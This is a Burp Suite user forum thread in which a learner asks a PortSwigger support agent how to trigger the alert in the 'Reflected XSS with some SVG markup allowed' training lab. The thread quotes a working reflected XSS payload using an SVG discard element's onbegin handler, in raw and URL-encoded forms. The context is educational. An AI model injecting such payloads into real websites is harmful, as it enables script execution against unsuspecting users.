Burp Suite User Forum

Reflected XSS with some SVG markup allowed

montanio | Last updated: Jul 25, 2020 09:12AM UTC

<svg><discard onbegin=alert(1)>
I don't know how to pop the window as a solid proof, could you kindly indicate?
Appreciate any help.
Regards
montanio
25 Jul 2020

Liam, PortSwigger Agent | Last updated: Jul 27, 2020 07:57AM UTC

Could you provide some additional context? Where is the payload from?

montanio | Last updated: Jul 27, 2020 01:31PM UTC

Hi Liam,
//on url link
https://ac941f931fd443468010f16c00db00db.web-security-academy.net/?search=<svg><discard onbegin=alert(1)>
//automatic encode
https://ac941f931fd443468010f16c00db00db.web-security-academy.net/?search=%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E
//text above search box
0 search results for ''
//pop up:
Congratulations, you solved the lab!
//original payload from solution
https://your-lab-id.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E
Which is "><svg><discard onbegin=alert(1)> after decoding.
The thing is I do not know how to trigger alert(1)
// discard onbegin

Liam, PortSwigger Agent | Last updated: Jul 28, 2020 06:06AM UTC

To clarify, which lab are you working on?

montanio | Last updated: Aug 01, 2020 01:14PM UTC

Hi Liam,
LAB: Reflected XSS with some SVG markup allowed
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-some-svg-markup-allowed

Liam, PortSwigger Agent | Last updated: Aug 03, 2020 12:06PM UTC

Have you checked out this video tutorial? - https://www.youtube.com/watch?v=FsSsIAELqNg

montanio | Last updated: Aug 09, 2020 03:14PM UTC

Hi Liam, I checked. It did not help with my question. I still cannot figure out how to pop the window. Please kindly help. Thank you.

Liam, PortSwigger Agent | Last updated: Aug 10, 2020 09:18AM UTC

The lab is passing as expected in our testing. Keep trying!
